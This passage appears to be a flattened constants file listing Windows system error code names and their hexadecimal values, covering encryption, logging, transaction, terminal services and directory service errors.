ERROR_ENCRYPTION_FAILED = 0x1770 + ERROR_DECRYPTION_FAILED = 0x1771 + ERROR_FILE_ENCRYPTED = 0x1772 + ERROR_NO_RECOVERY_POLICY = 0x1773 + ERROR_NO_EFS = 0x1774 + ERROR_WRONG_EFS = 0x1775 + ERROR_NO_USER_KEYS = 0x1776 + ERROR_FILE_NOT_ENCRYPTED = 0x1777 + ERROR_NOT_EXPORT_FORMAT = 0x1778 + ERROR_FILE_READ_ONLY = 0x1779 + ERROR_DIR_EFS_DISALLOWED = 0x177A + ERROR_EFS_SERVER_NOT_TRUSTED = 0x177B + ERROR_BAD_RECOVERY_POLICY = 0x177C + ERROR_EFS_ALG_BLOB_TOO_BIG = 0x177D + ERROR_VOLUME_NOT_SUPPORT_EFS = 0x177E + ERROR_EFS_DISABLED = 0x177F + ERROR_EFS_VERSION_NOT_SUPPORT = 0x1780 + ERROR_CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0x1781 + ERROR_CS_ENCRYPTION_UNSUPPORTED_SERVER = 0x1782 + ERROR_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0x1783 + ERROR_CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0x1784 + ERROR_CS_ENCRYPTION_FILE_NOT_CSE = 0x1785 + ERROR_NO_BROWSER_SERVERS_FOUND = 0x17E6 + SCHED_E_SERVICE_NOT_LOCALSYSTEM = 0x1838 + ERROR_LOG_SECTOR_INVALID = 0x19C8 + ERROR_LOG_SECTOR_PARITY_INVALID = 0x19C9 + ERROR_LOG_SECTOR_REMAPPED = 0x19CA + ERROR_LOG_BLOCK_INCOMPLETE = 0x19CB + ERROR_LOG_INVALID_RANGE = 0x19CC + ERROR_LOG_BLOCKS_EXHAUSTED = 0x19CD + ERROR_LOG_READ_CONTEXT_INVALID = 0x19CE + ERROR_LOG_RESTART_INVALID = 0x19CF + ERROR_LOG_BLOCK_VERSION = 0x19D0 + ERROR_LOG_BLOCK_INVALID = 0x19D1 + ERROR_LOG_READ_MODE_INVALID = 0x19D2 + ERROR_LOG_NO_RESTART = 0x19D3 + ERROR_LOG_METADATA_CORRUPT = 0x19D4 + ERROR_LOG_METADATA_INVALID = 0x19D5 + ERROR_LOG_METADATA_INCONSISTENT = 0x19D6 + ERROR_LOG_RESERVATION_INVALID = 0x19D7 + ERROR_LOG_CANT_DELETE = 0x19D8 + ERROR_LOG_CONTAINER_LIMIT_EXCEEDED = 0x19D9 + ERROR_LOG_START_OF_LOG = 0x19DA + ERROR_LOG_POLICY_ALREADY_INSTALLED = 0x19DB + ERROR_LOG_POLICY_NOT_INSTALLED = 0x19DC + ERROR_LOG_POLICY_INVALID = 0x19DD + ERROR_LOG_POLICY_CONFLICT = 0x19DE + ERROR_LOG_PINNED_ARCHIVE_TAIL = 0x19DF + ERROR_LOG_RECORD_NONEXISTENT = 0x19E0 + ERROR_LOG_RECORDS_RESERVED_INVALID = 0x19E1 + ERROR_LOG_SPACE_RESERVED_INVALID = 0x19E2 + ERROR_LOG_TAIL_INVALID = 0x19E3 + ERROR_LOG_FULL = 0x19E4 + ERROR_COULD_NOT_RESIZE_LOG = 0x19E5 + ERROR_LOG_MULTIPLEXED = 0x19E6 + ERROR_LOG_DEDICATED = 0x19E7 + ERROR_LOG_ARCHIVE_NOT_IN_PROGRESS = 0x19E8 + ERROR_LOG_ARCHIVE_IN_PROGRESS = 0x19E9 + ERROR_LOG_EPHEMERAL = 0x19EA + ERROR_LOG_NOT_ENOUGH_CONTAINERS = 0x19EB + ERROR_LOG_CLIENT_ALREADY_REGISTERED = 0x19EC + ERROR_LOG_CLIENT_NOT_REGISTERED = 0x19ED + ERROR_LOG_FULL_HANDLER_IN_PROGRESS = 0x19EE + ERROR_LOG_CONTAINER_READ_FAILED = 0x19EF + ERROR_LOG_CONTAINER_WRITE_FAILED = 0x19F0 + ERROR_LOG_CONTAINER_OPEN_FAILED = 0x19F1 + ERROR_LOG_CONTAINER_STATE_INVALID = 0x19F2 + ERROR_LOG_STATE_INVALID = 0x19F3 + ERROR_LOG_PINNED = 0x19F4 + ERROR_LOG_METADATA_FLUSH_FAILED = 0x19F5 + ERROR_LOG_INCONSISTENT_SECURITY = 0x19F6 + ERROR_LOG_APPENDED_FLUSH_FAILED = 0x19F7 + ERROR_LOG_PINNED_RESERVATION = 0x19F8 + ERROR_INVALID_TRANSACTION = 0x1A2C + ERROR_TRANSACTION_NOT_ACTIVE = 0x1A2D + ERROR_TRANSACTION_REQUEST_NOT_VALID = 0x1A2E + ERROR_TRANSACTION_NOT_REQUESTED = 0x1A2F + ERROR_TRANSACTION_ALREADY_ABORTED = 0x1A30 + ERROR_TRANSACTION_ALREADY_COMMITTED = 0x1A31 + ERROR_TM_INITIALIZATION_FAILED = 0x1A32 + ERROR_RESOURCEMANAGER_READ_ONLY = 0x1A33 + ERROR_TRANSACTION_NOT_JOINED = 0x1A34 + ERROR_TRANSACTION_SUPERIOR_EXISTS = 0x1A35 + ERROR_CRM_PROTOCOL_ALREADY_EXISTS = 0x1A36 + ERROR_TRANSACTION_PROPAGATION_FAILED = 0x1A37 + ERROR_CRM_PROTOCOL_NOT_FOUND = 0x1A38 + ERROR_TRANSACTION_INVALID_MARSHALL_BUFFER = 0x1A39 + ERROR_CURRENT_TRANSACTION_NOT_VALID = 0x1A3A + ERROR_TRANSACTION_NOT_FOUND = 0x1A3B + ERROR_RESOURCEMANAGER_NOT_FOUND = 0x1A3C + ERROR_ENLISTMENT_NOT_FOUND = 0x1A3D + ERROR_TRANSACTIONMANAGER_NOT_FOUND = 0x1A3E + ERROR_TRANSACTIONMANAGER_NOT_ONLINE = 0x1A3F + ERROR_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0x1A40 + ERROR_TRANSACTION_NOT_ROOT = 0x1A41 + ERROR_TRANSACTION_OBJECT_EXPIRED = 0x1A42 + ERROR_TRANSACTION_RESPONSE_NOT_ENLISTED = 0x1A43 + ERROR_TRANSACTION_RECORD_TOO_LONG = 0x1A44 + ERROR_IMPLICIT_TRANSACTION_NOT_SUPPORTED = 0x1A45 + ERROR_TRANSACTION_INTEGRITY_VIOLATED = 0x1A46 + ERROR_TRANSACTIONMANAGER_IDENTITY_MISMATCH = 0x1A47 + ERROR_RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT = 0x1A48 + ERROR_TRANSACTION_MUST_WRITETHROUGH = 0x1A49 + ERROR_TRANSACTION_NO_SUPERIOR = 0x1A4A + ERROR_HEURISTIC_DAMAGE_POSSIBLE = 0x1A4B + ERROR_TRANSACTIONAL_CONFLICT = 0x1A90 + ERROR_RM_NOT_ACTIVE = 0x1A91 + ERROR_RM_METADATA_CORRUPT = 0x1A92 + ERROR_DIRECTORY_NOT_RM = 0x1A93 + ERROR_TRANSACTIONS_UNSUPPORTED_REMOTE = 0x1A95 + ERROR_LOG_RESIZE_INVALID_SIZE = 0x1A96 + ERROR_OBJECT_NO_LONGER_EXISTS = 0x1A97 + ERROR_STREAM_MINIVERSION_NOT_FOUND = 0x1A98 + ERROR_STREAM_MINIVERSION_NOT_VALID = 0x1A99 + ERROR_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0x1A9A + ERROR_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0x1A9B + ERROR_CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0x1A9C + ERROR_REMOTE_FILE_VERSION_MISMATCH = 0x1A9E + ERROR_HANDLE_NO_LONGER_VALID = 0x1A9F + ERROR_NO_TXF_METADATA = 0x1AA0 + ERROR_LOG_CORRUPTION_DETECTED = 0x1AA1 + ERROR_CANT_RECOVER_WITH_HANDLE_OPEN = 0x1AA2 + ERROR_RM_DISCONNECTED = 0x1AA3 + ERROR_ENLISTMENT_NOT_SUPERIOR = 0x1AA4 + ERROR_RECOVERY_NOT_NEEDED = 0x1AA5 + ERROR_RM_ALREADY_STARTED = 0x1AA6 + ERROR_FILE_IDENTITY_NOT_PERSISTENT = 0x1AA7 + ERROR_CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0x1AA8 + ERROR_CANT_CROSS_RM_BOUNDARY = 0x1AA9 + ERROR_TXF_DIR_NOT_EMPTY = 0x1AAA + ERROR_INDOUBT_TRANSACTIONS_EXIST = 0x1AAB + ERROR_TM_VOLATILE = 0x1AAC + ERROR_ROLLBACK_TIMER_EXPIRED = 0x1AAD + ERROR_TXF_ATTRIBUTE_CORRUPT = 0x1AAE + ERROR_EFS_NOT_ALLOWED_IN_TRANSACTION = 0x1AAF + ERROR_TRANSACTIONAL_OPEN_NOT_ALLOWED = 0x1AB0 + ERROR_LOG_GROWTH_FAILED = 0x1AB1 + ERROR_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0x1AB2 + ERROR_TXF_METADATA_ALREADY_PRESENT = 0x1AB3 + ERROR_TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x1AB4 + ERROR_TRANSACTION_REQUIRED_PROMOTION = 0x1AB5 + ERROR_CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0x1AB6 + ERROR_TRANSACTIONS_NOT_FROZEN = 0x1AB7 + ERROR_TRANSACTION_FREEZE_IN_PROGRESS = 0x1AB8 + ERROR_NOT_SNAPSHOT_VOLUME = 0x1AB9 + ERROR_NO_SAVEPOINT_WITH_OPEN_FILES = 0x1ABA + ERROR_DATA_LOST_REPAIR = 0x1ABB + ERROR_SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0x1ABC + ERROR_TM_IDENTITY_MISMATCH = 0x1ABD + ERROR_FLOATED_SECTION = 0x1ABE + ERROR_CANNOT_ACCEPT_TRANSACTED_WORK = 0x1ABF + ERROR_CANNOT_ABORT_TRANSACTIONS = 0x1AC0 + ERROR_BAD_CLUSTERS = 0x1AC1 + ERROR_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0x1AC2 + ERROR_VOLUME_DIRTY = 0x1AC3 + ERROR_NO_LINK_TRACKING_IN_TRANSACTION = 0x1AC4 + ERROR_OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0x1AC5 + ERROR_EXPIRED_HANDLE = 0x1AC6 + ERROR_TRANSACTION_NOT_ENLISTED = 0x1AC7 + ERROR_CTX_WINSTATION_NAME_INVALID = 0x1B59 + ERROR_CTX_INVALID_PD = 0x1B5A + ERROR_CTX_PD_NOT_FOUND = 0x1B5B + ERROR_CTX_WD_NOT_FOUND = 0x1B5C + ERROR_CTX_CANNOT_MAKE_EVENTLOG_ENTRY = 0x1B5D + ERROR_CTX_SERVICE_NAME_COLLISION = 0x1B5E + ERROR_CTX_CLOSE_PENDING = 0x1B5F + ERROR_CTX_NO_OUTBUF = 0x1B60 + ERROR_CTX_MODEM_INF_NOT_FOUND = 0x1B61 + ERROR_CTX_INVALID_MODEMNAME = 0x1B62 + ERROR_CTX_MODEM_RESPONSE_ERROR = 0x1B63 + ERROR_CTX_MODEM_RESPONSE_TIMEOUT = 0x1B64 + ERROR_CTX_MODEM_RESPONSE_NO_CARRIER = 0x1B65 + ERROR_CTX_MODEM_RESPONSE_NO_DIALTONE = 0x1B66 + ERROR_CTX_MODEM_RESPONSE_BUSY = 0x1B67 + ERROR_CTX_MODEM_RESPONSE_VOICE = 0x1B68 + ERROR_CTX_TD_ERROR = 0x1B69 + ERROR_CTX_WINSTATION_NOT_FOUND = 0x1B6E + ERROR_CTX_WINSTATION_ALREADY_EXISTS = 0x1B6F + ERROR_CTX_WINSTATION_BUSY = 0x1B70 + ERROR_CTX_BAD_VIDEO_MODE = 0x1B71 + ERROR_CTX_GRAPHICS_INVALID = 0x1B7B + ERROR_CTX_LOGON_DISABLED = 0x1B7D + ERROR_CTX_NOT_CONSOLE = 0x1B7E + ERROR_CTX_CLIENT_QUERY_TIMEOUT = 0x1B80 + ERROR_CTX_CONSOLE_DISCONNECT = 0x1B81 + ERROR_CTX_CONSOLE_CONNECT = 0x1B82 + ERROR_CTX_SHADOW_DENIED = 0x1B84 + ERROR_CTX_WINSTATION_ACCESS_DENIED = 0x1B85 + ERROR_CTX_INVALID_WD = 0x1B89 + ERROR_CTX_SHADOW_INVALID = 0x1B8A + ERROR_CTX_SHADOW_DISABLED = 0x1B8B + ERROR_CTX_CLIENT_LICENSE_IN_USE = 0x1B8C + ERROR_CTX_CLIENT_LICENSE_NOT_SET = 0x1B8D + ERROR_CTX_LICENSE_NOT_AVAILABLE = 0x1B8E + ERROR_CTX_LICENSE_CLIENT_INVALID = 0x1B8F + ERROR_CTX_LICENSE_EXPIRED = 0x1B90 + ERROR_CTX_SHADOW_NOT_RUNNING = 0x1B91 + ERROR_CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0x1B92 + ERROR_ACTIVATION_COUNT_EXCEEDED = 0x1B93 + ERROR_CTX_WINSTATIONS_DISABLED = 0x1B94 + ERROR_CTX_ENCRYPTION_LEVEL_REQUIRED = 0x1B95 + ERROR_CTX_SESSION_IN_USE = 0x1B96 + ERROR_CTX_NO_FORCE_LOGOFF = 0x1B97 + ERROR_CTX_ACCOUNT_RESTRICTION = 0x1B98 + ERROR_RDP_PROTOCOL_ERROR = 0x1B99 + ERROR_CTX_CDM_CONNECT = 0x1B9A + ERROR_CTX_CDM_DISCONNECT = 0x1B9B + ERROR_CTX_SECURITY_LAYER_ERROR = 0x1B9C + ERROR_TS_INCOMPATIBLE_SESSIONS = 0x1B9D + ERROR_TS_VIDEO_SUBSYSTEM_ERROR = 0x1B9E + FRS_ERR_INVALID_API_SEQUENCE = 0x1F41 + FRS_ERR_STARTING_SERVICE = 0x1F42 + FRS_ERR_STOPPING_SERVICE = 0x1F43 + FRS_ERR_INTERNAL_API = 0x1F44 + FRS_ERR_INTERNAL = 0x1F45 + FRS_ERR_SERVICE_COMM = 0x1F46 + FRS_ERR_INSUFFICIENT_PRIV = 0x1F47 + FRS_ERR_AUTHENTICATION = 0x1F48 + FRS_ERR_PARENT_INSUFFICIENT_PRIV = 0x1F49 + FRS_ERR_PARENT_AUTHENTICATION = 0x1F4A + FRS_ERR_CHILD_TO_PARENT_COMM = 0x1F4B + FRS_ERR_PARENT_TO_CHILD_COMM = 0x1F4C + FRS_ERR_SYSVOL_POPULATE = 0x1F4D + FRS_ERR_SYSVOL_POPULATE_TIMEOUT = 0x1F4E + FRS_ERR_SYSVOL_IS_BUSY = 0x1F4F + FRS_ERR_SYSVOL_DEMOTE = 0x1F50 + FRS_ERR_INVALID_SERVICE_PARAMETER = 0x1F51 + ERROR_DS_NOT_INSTALLED = 0x2008 + ERROR_DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x2009 + ERROR_DS_NO_ATTRIBUTE_OR_VALUE = 0x200A + ERROR_DS_INVALID_ATTRIBUTE_SYNTAX = 0x200B + ERROR_DS_ATTRIBUTE_TYPE_UNDEFINED = 0x200C + ERROR_DS_ATTRIBUTE_OR_VALUE_EXISTS = 0x200D + ERROR_DS_BUSY = 0x200E + ERROR_DS_UNAVAILABLE = 0x200F + ERROR_DS_NO_RIDS_ALLOCATED = 0x2010 + ERROR_DS_NO_MORE_RIDS = 0x2011 + ERROR_DS_INCORRECT_ROLE_OWNER = 0x2012 + ERROR_DS_RIDMGR_INIT_ERROR = 0x2013 + ERROR_DS_OBJ_CLASS_VIOLATION = 0x2014 + ERROR_DS_CANT_ON_NON_LEAF = 0x2015 + ERROR_DS_CANT_ON_RDN = 0x2016 + ERROR_DS_CANT_MOD_OBJ_CLASS = 0x2017 + ERROR_DS_CROSS_DOM_MOVE_ERROR = 0x2018 + ERROR_DS_GC_NOT_AVAILABLE = 0x2019 + ERROR_SHARED_POLICY = 0x201A + ERROR_POLICY_OBJECT_NOT_FOUND = 0x201B + ERROR_POLICY_ONLY_IN_DS = 0x201C + ERROR_PROMOTION_ACTIVE = 0x201D + ERROR_NO_PROMOTION_ACTIVE = 0x201E + ERROR_DS_OPERATIONS_ERROR = 0x2020 + ERROR_DS_PROTOCOL_ERROR = 0x2021 + ERROR_DS_TIMELIMIT_EXCEEDED = 0x2022 + ERROR_DS_SIZELIMIT_EXCEEDED = 0x2023 + ERROR_DS_ADMIN_LIMIT_EXCEEDED = 0x2024 + ERROR_DS_COMPARE_FALSE = 0x2025 + ERROR_DS_COMPARE_TRUE = 0x2026 + ERROR_DS_AUTH_METHOD_NOT_SUPPORTED = 0x2027 + ERROR_DS_STRONG_AUTH_REQUIRED = 0x2028 + ERROR_DS_INAPPROPRIATE_AUTH = 0x2029 + ERROR_DS_AUTH_UNKNOWN = 0x202A + ERROR_DS_REFERRAL = 0x202B + ERROR_DS_UNAVAILABLE_CRIT_EXTENSION = 0x202C + ERROR_DS_CONFIDENTIALITY_REQUIRED = 0x202D + ERROR_DS_INAPPROPRIATE_MATCHING = 0x202E + ERROR_DS_CONSTRAINT_VIOLATION = 0x202F + ERROR_DS_NO_SUCH_OBJECT = 0x2030 + ERROR_DS_ALIAS_PROBLEM = 0x2031 + ERROR_DS_INVALID_DN_SYNTAX = 0x2032 + ERROR_DS_IS_LEAF = 0x2033 + ERROR_DS_ALIAS_DEREF_PROBLEM = 0x2034 + ERROR_DS_UNWILLING_TO_PERFORM = 0x2035 + ERROR_DS_LOOP_DETECT = 0x2036 + ERROR_DS_NAMING_VIOLATION = 0x2037 + ERROR_DS_OBJECT_RESULTS_TOO_LARGE = 0x2038 + ERROR_DS_AFFECTS_MULTIPLE_DSAS = 0x2039 + ERROR_DS_SERVER_DOWN = 0x203A + ERROR_DS_LOCAL_ERROR = 0x203B + ERROR_DS_ENCODING_ERROR = 0x203C + ERROR_DS_DECODING_ERROR = 0x203D + ERROR_DS_FILTER_UNKNOWN = 0x203E + ERROR_DS_PARAM_ERROR = 0x203F + ERROR_DS_NOT_SUPPORTED = 0x2040 + ERROR_DS_NO_RESULTS_RETURNED = 0x2041 + ERROR_DS_CONTROL_NOT_FOUND = 0x2042 + ERROR_DS_CLIENT_LOOP = 0x2043 + ERROR_DS_REFERRAL_LIMIT_EXCEEDED = 0x2044 + ERROR_DS_SORT_CONTROL_MISSING = 0x2045 + ERROR_DS_OFFSET_RANGE_ERROR = 0x2046 + ERROR_DS_ROOT_MUST_BE_NC = 0x206D + ERROR_DS_ADD_REPLICA_INHIBITED = 0x206E + ERROR_DS_ATT_NOT_DEF_IN_SCHEMA = 0x206F + ERROR_DS_MAX_OBJ_SIZE_EXCEEDED = 0x2070 + ERROR_DS_OBJ_STRING_NAME_EXISTS = 0x2071 + ERROR_DS_NO_RDN_DEFINED_IN_SCHEMA = 0x2072 + ERROR_DS_RDN_DOESNT_MATCH_SCHEMA = 0x2073 + ERROR_DS_NO_REQUESTED_ATTS_FOUND = 0x2074 + ERROR_DS_USER_BUFFER_TO_SMALL = 0x2075 + ERROR_DS_ATT_IS_NOT_ON_OBJ = 0x2076 + ERROR_DS_ILLEGAL_MOD_OPERATION = 0x2077 + ERROR_DS_OBJ_TOO_LARGE = 0x2078 + ERROR_DS_BAD_INSTANCE_TYPE = 0x2079 + ERROR_DS_MASTERDSA_REQUIRED = 0x207A + ERROR_DS_OBJECT_CLASS_REQUIRED = 0x207B + ERROR_DS_MISSING_REQUIRED_ATT = 0x207C + ERROR_DS_ATT_NOT_DEF_FOR_CLASS = 0x207D + ERROR_DS_ATT_ALREADY_EXISTS = 0x207E + ERROR_DS_CANT_ADD_ATT_VALUES = 0x2080 + ERROR_DS_SINGLE_VALUE_CONSTRAINT = 0x2081 + ERROR_DS_RANGE_CONSTRAINT = 0x2082 + ERROR_DS_ATT_VAL_ALREADY_EXISTS = 0x2083 + ERROR_DS_CANT_REM_MISSING_ATT = 0x2084 + ERROR_DS_CANT_REM_MISSING_ATT_VAL = 0x2085 + ERROR_DS_ROOT_CANT_BE_SUBREF = 0x2086 + ERROR_DS_NO_CHAINING = 0x2087 + ERROR_DS_NO_CHAINED_EVAL = 0x2088 + ERROR_DS_NO_PARENT_OBJECT = 0x2089 + ERROR_DS_PARENT_IS_AN_ALIAS = 0x208A + ERROR_DS_CANT_MIX_MASTER_AND_REPS = 0x208B + ERROR_DS_CHILDREN_EXIST = 0x208C + ERROR_DS_OBJ_NOT_FOUND = 0x208D + ERROR_DS_ALIASED_OBJ_MISSING = 0x208E + ERROR_DS_BAD_NAME_SYNTAX = 0x208F + ERROR_DS_ALIAS_POINTS_TO_ALIAS = 0x2090 + ERROR_DS_CANT_DEREF_ALIAS = 0x2091 + ERROR_DS_OUT_OF_SCOPE = 0x2092 + ERROR_DS_CANT_DELETE_DSA_OBJ = 0x2094 + ERROR_DS_GENERIC_ERROR = 0x2095 + ERROR_DS_DSA_MUST_BE_INT_MASTER = 0x2096 + ERROR_DS_CLASS_NOT_DSA = 0x2097 + ERROR_DS_INSUFF_ACCESS_RIGHTS = 0x2098 + ERROR_DS_ILLEGAL_SUPERIOR = 0x2099 + ERROR_DS_ATTRIBUTE_OWNED_BY_SAM = 0x209A + ERROR_DS_NAME_TOO_MANY_PARTS = 0x209B + ERROR_DS_NAME_TOO_LONG = 0x209C + ERROR_DS_NAME_VALUE_TOO_LONG = 0x209D + ERROR_DS_NAME_UNPARSEABLE = 0x209E + ERROR_DS_NAME_TYPE_UNKNOWN = 0x209F + ERROR_DS_NOT_AN_OBJECT = 0x20A0 + ERROR_DS_SEC_DESC_TOO_SHORT = 0x20A1 + ERROR_DS_SEC_DESC_INVALID = 0x20A2 + ERROR_DS_NO_DELETED_NAME = 0x20A3 + ERROR_DS_SUBREF_MUST_HAVE_PARENT = 0x20A4 + ERROR_DS_NCNAME_MUST_BE_NC = 0x20A5 + ERROR_DS_CANT_ADD_SYSTEM_ONLY = 0x20A6 + ERROR_DS_CLASS_MUST_BE_CONCRETE = 0x20A7 + ERROR_DS_INVALID_DMD = 0x20A8 + ERROR_DS_OBJ_GUID_EXISTS = 0x20A9 + ERROR_DS_NOT_ON_BACKLINK = 0x20AA + ERROR_DS_NO_CROSSREF_FOR_NC = 0x20AB + ERROR_DS_SHUTTING_DOWN = 0x20AC + ERROR_DS_UNKNOWN_OPERATION = 0x20AD + ERROR_DS_INVALID_ROLE_OWNER = 0x20AE + ERROR_DS_COULDNT_CONTACT_FSMO = 0x20AF + ERROR_DS_CROSS_NC_DN_RENAME = 0x20B0 + ERROR_DS_CANT_MOD_SYSTEM_ONLY = 0x20B1 + ERROR_DS_REPLICATOR_ONLY = 0x20B2 + ERROR_DS_OBJ_CLASS_NOT_DEFINED = 0x20B3 + ERROR_DS_OBJ_CLASS_NOT_SUBCLASS = 0x20B4 + ERROR_DS_NAME_REFERENCE_INVALID = 0x20B5 + ERROR_DS_CROSS_REF_EXISTS = 0x20B6 + ERROR_DS_CANT_DEL_MASTER_CROSSREF = 0x20B7 + ERROR_DS_SUBTREE_NOTIFY_NOT_NC_HEAD = 0x20B8 + ERROR_DS_NOTIFY_FILTER_TOO_COMPLEX = 0x20B9 + ERROR_DS_DUP_RDN = 0x20BA + ERROR_DS_DUP_OID = 0x20BB + ERROR_DS_DUP_MAPI_ID = 0x20BC + ERROR_DS_DUP_SCHEMA_ID_GUID = 0x20BD + ERROR_DS_DUP_LDAP_DISPLAY_NAME = 0x20BE + ERROR_DS_SEMANTIC_ATT_TEST = 0x20BF + ERROR_DS_SYNTAX_MISMATCH = 0x20C0 + ERROR_DS_EXISTS_IN_MUST_HAVE = 0x20C1 + ERROR_DS_EXISTS_IN_MAY_HAVE = 0x20C2 + ERROR_DS_NONEXISTENT_MAY_HAVE = 0x20C3 + ERROR_DS_NONEXISTENT_MUST_HAVE = 0x20C4 + ERROR_DS_AUX_CLS_TEST_FAIL = 0x20C5 + ERROR_DS_NONEXISTENT_POSS_SUP = 0x20C6 + ERROR_DS_SUB_CLS_TEST_FAIL = 0x20C7 + ERROR_DS_BAD_RDN_ATT_ID_SYNTAX = 0x20C8 + ERROR_DS_EXISTS_IN_AUX_CLS = 0x20C9 + ERROR_DS_EXISTS_IN_SUB_CLS = 0x20CA + ERROR_DS_EXISTS_IN_POSS_SUP = 0x20CB + ERROR_DS_RECALCSCHEMA_FAILED = 0x20CC + ERROR_DS_TREE_DELETE_NOT_FINISHED = 0x20CD + ERROR_DS_CANT_DELETE = 0x20CE + ERROR_DS_ATT_SCHEMA_REQ_ID = 0x20CF + ERROR_DS_BAD_ATT_SCHEMA_SYNTAX = 0x20D0 + ERROR_DS_CANT_CACHE_ATT = 0x20D1 + ERROR_DS_CANT_CACHE_CLASS = 0x20D2 + ERROR_DS_CANT_REMOVE_ATT_CACHE = 0x20D3 + ERROR_DS_CANT_REMOVE_CLASS_CACHE = 0x20D4 + ERROR_DS_CANT_RETRIEVE_DN = 0x20D5 + ERROR_DS_MISSING_SUPREF = 0x20D6 + ERROR_DS_CANT_RETRIEVE_INSTANCE = 0x20D7 + ERROR_DS_CODE_INCONSISTENCY = 0x20D8 + ERROR_DS_DATABASE_ERROR = 0x20D9 + ERROR_DS_GOVERNSID_MISSING = 0x20DA + ERROR_DS_MISSING_EXPECTED_ATT = 0x20DB + ERROR_DS_NCNAME_MISSING_CR_REF = 0x20DC + ERROR_DS_SECURITY_CHECKING_ERROR = 0x20DD + ERROR_DS_SCHEMA_NOT_LOADED = 0x20DE + ERROR_DS_SCHEMA_ALLOC_FAILED = 0x20DF + ERROR_DS_ATT_SCHEMA_REQ_SYNTAX = 0x20E0 + ERROR_DS_GCVERIFY_ERROR = 0x20E1 + ERROR_DS_DRA_SCHEMA_MISMATCH = 0x20E2 + ERROR_DS_CANT_FIND_DSA_OBJ = 0x20E3 + ERROR_DS_CANT_FIND_EXPECTED_NC = 0x20E4 + ERROR_DS_CANT_FIND_NC_IN_CACHE = 0x20E5 + ERROR_DS_CANT_RETRIEVE_CHILD = 0x20E6 + ERROR_DS_SECURITY_ILLEGAL_MODIFY = 0x20E7 + ERROR_DS_CANT_REPLACE_HIDDEN_REC = 0x20E8 + ERROR_DS_BAD_HIERARCHY_FILE = 0x20E9 + ERROR_DS_BUILD_HIERARCHY_TABLE_FAILED = 0x20EA + ERROR_DS_CONFIG_PARAM_MISSING = 0x20EB + ERROR_DS_COUNTING_AB_INDICES_FAILED = 0x20EC + ERROR_DS_HIERARCHY_TABLE_MALLOC_FAILED = 0x20ED + ERROR_DS_INTERNAL_FAILURE = 0x20EE + ERROR_DS_UNKNOWN_ERROR = 0x20EF + ERROR_DS_ROOT_REQUIRES_CLASS_TOP = 0x20F0 + ERROR_DS_REFUSING_FSMO_ROLES = 0x20F1 + ERROR_DS_MISSING_FSMO_SETTINGS = 0x20F2 + ERROR_DS_UNABLE_TO_SURRENDER_ROLES = 0x20F3 + ERROR_DS_DRA_GENERIC = 0x20F4 + ERROR_DS_DRA_INVALID_PARAMETER = 0x20F5 + ERROR_DS_DRA_BUSY = 0x20F6 + ERROR_DS_DRA_BAD_DN = 0x20F7 + ERROR_DS_DRA_BAD_NC = 0x20F8 + ERROR_DS_DRA_DN_EXISTS = 0x20F9 + ERROR_DS_DRA_INTERNAL_ERROR = 0x20FA + ERROR_DS_DRA_INCONSISTENT_DIT = 0x20FB + ERROR_DS_DRA_CONNECTION_FAILED = 0x20FC + ERROR_DS_DRA_BAD_INSTANCE_TYPE = 0x20FD + ERROR_DS_DRA_OUT_OF_MEM = 0x20FE + ERROR_DS_DRA_MAIL_PROBLEM = 0x20FF + ERROR_DS_DRA_REF_ALREADY_EXISTS = 0x2100 + ERROR_DS_DRA_REF_NOT_FOUND = 0x2101 + ERROR_DS_DRA_OBJ_IS_REP_SOURCE = 0x2102 + ERROR_DS_DRA_DB_ERROR = 0x2103 + ERROR_DS_DRA_NO_REPLICA = 0x2104 + ERROR_DS_DRA_ACCESS_DENIED = 0x2105 + ERROR_DS_DRA_NOT_SUPPORTED = 0x2106 + ERROR_DS_DRA_RPC_CANCELLED = 0x2107 + ERROR_DS_DRA_SOURCE_DISABLED = 0x2108 + ERROR_DS_DRA_SINK_DISABLED = 0x2109 + ERROR_DS_DRA_NAME_COLLISION = 0x210A + ERROR_DS_DRA_SOURCE_REINSTALLED = 0x210B + ERROR_DS_DRA_MISSING_PARENT = 0x210C + ERROR_DS_DRA_PREEMPTED = 0x210D + ERROR_DS_DRA_ABANDON_SYNC = 0x210E + ERROR_DS_DRA_SHUTDOWN = 0x210F + ERROR_DS_DRA_INCOMPATIBLE_PARTIAL_SET = 0x2110 + ERROR_DS_DRA_SOURCE_IS_PARTIAL_REPLICA = 0x2111 + ERROR_DS_DRA_EXTN_CONNECTION_FAILED = 0x2112 + ERROR_DS_INSTALL_SCHEMA_MISMATCH = 0x2113 + ERROR_DS_DUP_LINK_ID = 0x2114 + ERROR_DS_NAME_ERROR_RESOLVING = 0x2115 + ERROR_DS_NAME_ERROR_NOT_FOUND = 0x2116 + ERROR_DS_NAME_ERROR_NOT_UNIQUE = 0x2117 + ERROR_DS_NAME_ERROR_NO_MAPPING = 0x2118 + ERROR_DS_NAME_ERROR_DOMAIN_ONLY = 0x2119 + ERROR_DS_NAME_ERROR_NO_SYNTACTICAL_MAPPING = 0x211A + ERROR_DS_CONSTRUCTED_ATT_MOD = 0x211B + ERROR_DS_WRONG_OM_OBJ_CLASS = 0x211C + ERROR_DS_DRA_REPL_PENDING = 0x211D + ERROR_DS_DS_REQUIRED = 0x211E + ERROR_DS_INVALID_LDAP_DISPLAY_NAME = 0x211F + ERROR_DS_NON_BASE_SEARCH = 0x2120 + ERROR_DS_CANT_RETRIEVE_ATTS = 0x2121 + ERROR_DS_BACKLINK_WITHOUT_LINK = 0x2122 + ERROR_DS_EPOCH_MISMATCH = 0x2123 + ERROR_DS_SRC_NAME_MISMATCH = 0x2124 + ERROR_DS_SRC_AND_DST_NC_IDENTICAL = 0x2125 + ERROR_DS_DST_NC_MISMATCH = 